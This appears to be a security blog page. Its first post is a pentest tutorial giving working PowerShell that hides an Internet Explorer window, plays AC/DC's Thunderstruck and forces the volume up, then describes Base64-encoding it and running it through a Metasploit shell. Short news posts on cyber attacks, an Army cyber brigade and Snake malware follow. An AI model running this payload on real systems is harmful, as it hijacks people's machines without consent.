Recreating Iran AC/DC Thunderstruck Worm with PowerShell & Metasploit

Iran Thunderstruck

About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no,no – so don’t do it. Actually using this against any systems that you do not have express written permission to do so will probably end you up in jail – so again, don’t do it. Lastly, this is not new, it is from a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code to play AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbel. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check this out:

The code can be found at his Github site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly we will need a willing Windows 7 system as a target, this attack did not seem to work very well using a VMware virtual machine for a target (the up volume loop seems to bog systems down pretty good), so I used a stand alone system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

[string] $VideoURL = “http://www.youtube.com/watch?v=v2AC41dglnM”
#Create hidden IE Com Object
$IEComObject = New-Object -com “InternetExplorer.Application”
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
$EndTime = (Get-Date).addminutes(3)
Write-Verbose “Loop will end at $EndTime”
#ghetto way to do this but it basically presses volume up to raise volume in a loop for 3 minutes
do {
$WscriptObject = New-Object -com wscript.shell
$WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)

The VideoURL string sets the song, which is of course, Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False section tells PowerShell to hide the IE window so that it does not show up. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) where the Up Volume key (char 175) is called repeatedly. As mentioned earlier, this loop seems to really draw down the target computer, you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt“.

3. Base64 encode the script:

Iran Thunderstruck 2

And that is it, now all we need to do is use Metasploit to get a remote shell to the target system and then call the encoded script in our remote shell using PowerShell, like so:

Iran Thunderstruck 3

And that is it, after a short pause the target remote system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn down the volume using the speaker icon, it will fight them by turning it back up until the song is over!

Iran Thunderstruck 4

Defending against this attack

The bad thing about PowerShell based attacks is that most Anti-Viruses and Windows do not see them as malicious. So your best bet is to never, ever open unsolicited attachments you receive in social media sites or via e-mails. Also, run script blocking programs to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!

Advertisements

Watching Chinese Cyber Attacks against US as they Happen

Cyber Attack 4

I just happened to be up very early this morning and caught some of the chatter on Twitter about massive incoming cyber attacks against the US. So I pulled up the Live Attack map from Norse to check it out and saw the amazing image above.

From what I have seen, usually America and China are fairly even in the attack origins category.  But this morning there just seemed to be a flood of attacks from China being recorded by the Norse honeypot systems in St. Louis.

Stunning that the image just represents a fraction of real world attacks that are happening at any moment.

 

 

US Army Activates “Cyber Protection Brigade”

Army Cyber Brigade

On Friday the US Army activated what it is calling a “Cyber Protection Brigade”.

According to a post on Army.mil’s website:

“The Army is activating a Cyber Protection Brigade today, and discussing a new cyber branch that could be established as early as next month.

Command Sgt. Maj. Rodney D. Harris, Army Cyber Command, said the branch announcement could come as early as the second week of October, during the Association of the U.S. Army’s annual meeting.

The Cyber Protection Brigade is being activated by the U.S. Army Network Enterprise Technology Command at Fort Gordon, Georgia. It’s the first brigade of its kind in the Army and the nucleus of the new unit will be its cyber protection teams, according to the command.”

The cyber soldiers who are highly trained by the military will help defend the Army’s systems, but will also include offensive strike teams.

“The cyber teams will be roughly platoon-sized, but vary depending on their mission. The combat-mission or offense teams are larger, Harris said. The network defense or cyber-protection teams are mid-size.”

The Army may create a new cyber branch next month. It can take up to three years to train a NCO cyber leader, making it one of the longest training cycles. And with computer attacks increasing every day, the Army is focusing on obtaining and retaining troops who have cyber skills.

 

Russian “Cyber” Snake attacking Ukrainian Systems

Snake BAE

Everyone is expecting Russia to attack Ukrainian computer systems, but the truth may be that they have been doing so right along. One alleged Russian based cyber espionage tool named “Snake” has been active in the Ukraine and other places (even the US) since 2005.

Snake is named after Ouroboros in Ancient Greek mythology, and it was usually displayed as a snake or a dragon eating its own tail. The inference is that of something that is constantly re-creating itself.

Snake infections have been located in several countries – the US Department of Defense have been breached by an earlier version of the program. But as of 2013, the espionage tool usage seems to be aggressively targeting systems in the Ukraine:

Snake samples

BAE systems have recently released a report on Snake. According to the report, the tool seems to have originated from a nation that could fund sophisticated and expensive attack tools.

Martin Sutherland, Managing Director, BAE Systems Applied Intelligence said, “What this research once more demonstrates, is how organised and well-funded adversaries are using highly sophisticated tools and techniques to target legitimate organisations on a massive scale.”

And, “Although there has been some awareness of the Snake malware for some years, until now the full scale of its capabilities could not be revealed, and the threat it presents is clearly something that needs to be taken much more seriously.”

Snake allows remote access to an infected system, can hide and ex-filtrate pilfered data, seeks to infect other systems, uses stealthy communication techniques, has a rootkit section and can even bypass security features of 64 bit Windows systems.

A couple tell tail clues found during analysis, including time zone information and the language used in some lines of code seem to point to Russia as the tool creator. And with he increased attacks on the Ukraine within the last year makes Russia look even more the culprit.

BAE System’s report covers:

  • How the malware communicates,
  • The distinctive architectures which have evolved over the years,
  • The use of novel tricks to by-pass Windows security,
  • How it hides from traditional defensive tools.

Check out the full report on BAE’s website.